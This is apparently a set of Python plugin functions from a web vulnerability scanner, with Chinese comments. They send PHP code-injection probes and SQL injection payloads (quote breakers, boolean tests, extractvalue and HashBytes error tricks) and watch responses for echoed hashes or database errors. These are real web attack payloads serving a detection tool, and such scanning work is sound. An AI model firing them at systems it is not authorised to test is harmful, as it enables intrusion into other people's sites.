def audit(self): if WEB_PLATFORM.PHP not in self.response.programing and conf.level < 2: return regx = 'Parse error: syntax error,.*?\sin\s' randint = random.randint(5120, 10240) verify_result = md5(str(randint).encode()) _payloads = [ "print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='", "\";print(md5({}));$a=\"", "${{@print(md5({}))}}", "${{@print(md5({}))}}\\", "'.print(md5({})).'" ] # 载入处理位置以及原始payload iterdatas = self.generateItemdatas() errors = None errors_raw = () # 根据原始payload和位置组合新的payload for origin_dict, positon in iterdatas: payloads = self.paramsCombination(origin_dict, positon, _payloads) for key, value, new_value, payload in payloads: r = self.req(positon, payload) if not r: continue html1 = r.text if verify_result in html1: result = self.new_result() result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION) result.add_detail("payload探测", r.reqinfo, generateResponse(r), "探测payload:{}并发现回显:{}".format(new_value, verify_result), key, value, positon) self.success(result) break if re.search(regx, html1, re.I | re.S | re.M): result = self.new_result() result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION) result.add_detail("payload探测", r.reqinfo, generateResponse(r), "探测payload:{}并发现正则回显:{},可能是payload未闭合语句造成的错误".format(new_value, regx), key, value, positon) self.success(result) break if not errors: errors = sensitive_page_error_message_check(html1) if errors: errors_raw = (key, value) if errors: result = self.new_result() key, value = errors_raw result.init_info(self.requests.url, "敏感配置信息泄漏", VulType.SENSITIVE) for m in errors: text = m["text"] _type = m["type"] result.add_detail("payload请求", r.reqinfo, generateResponse(r), "匹配组件:{} 匹配正则:{}".format(_type, text), key, value, positon) self.success(result)
def audit(self): num = random_num(4) s = random_str(4) _payloads = [ '鎈\'"\(', "'", "')", "';", '"', '")', '";', ' order By 500 ', "--", "-0", ") AND {}={} AND ({}={}".format(num, num + 1, num, num), " AND {}={}%23".format(num, num + 1), " %' AND {}={} AND '%'='".format(num, num + 1), " ') AND {}={} AND ('{}'='{}".format(num, num + 1, s, s), " ' AND {}={} AND '{}'='{}".format(num, num + 1, s, s), '`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C", "extractvalue(1,concat(char(126),md5({})))".format(random_num), "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))". format(random_num) ] # 载入处理位置以及原始payload iterdatas = self.generateItemdatas() # 根据原始payload和位置组合新的payload for origin_dict, positon in iterdatas: payloads = self.paramsCombination(origin_dict, positon, _payloads) for key, value, new_value, payload in payloads: r = self.req(positon, payload) if not r: continue html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: result = self.new_result() result.init_info(self.requests.url, "SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "DBMS_TYPE:{} 匹配结果:{}".format( dbms_type, match.group()), key, payload, positon) self.success(result) return True message_lists = sensitive_page_error_message_check(html) if message_lists: result = self.new_result() result.init_info(self.requests.url, "SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "需要注意的报错信息:{}".format(repr(message_lists)), key, payload, positon) self.success(result) return True
def audit(self): headers = self.requests.headers p = urlparse(self.requests.url) domain = "{}://{}/".format(p.scheme, p.netloc) + random_str(6) + ".jsp" r = requests.get(domain, headers=headers) messages = sensitive_page_error_message_check(r.text) if messages: result = self.new_result() result.init_info(self.requests.url, "敏感的报错信息", VulType.SENSITIVE) for m in messages: text = m["text"] _type = m["type"] result.add_detail("payload请求", r.reqinfo, generateResponse(r), "匹配组件:{} 匹配正则:{}".format(_type, text), "", "", PLACE.GET) self.success(result)
def audit(self): _payloads = ['鎈\'"\('] # 载入处理位置以及原始payload iterdatas = self.generateItemdatas() # 根据原始payload和位置组合新的payload for origin_dict, positon in iterdatas: payloads = self.paramsCombination(origin_dict, positon, _payloads) for key, value, new_value, payload in payloads: r = self.req(positon, payload) if not r: continue html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: result = self.new_result() result.init_info(self.requests.url, "SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "DBMS_TYPE:{} 匹配结果:{}".format( dbms_type, match.group()), key, payload, positon) self.success(result) return True message_lists = sensitive_page_error_message_check(html) if message_lists: result = self.new_result() result.init_info(self.requests.url, "基于报错的SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "需要注意的报错信息:{}".format(repr(message_lists)), key, payload, positon) self.success(result) return True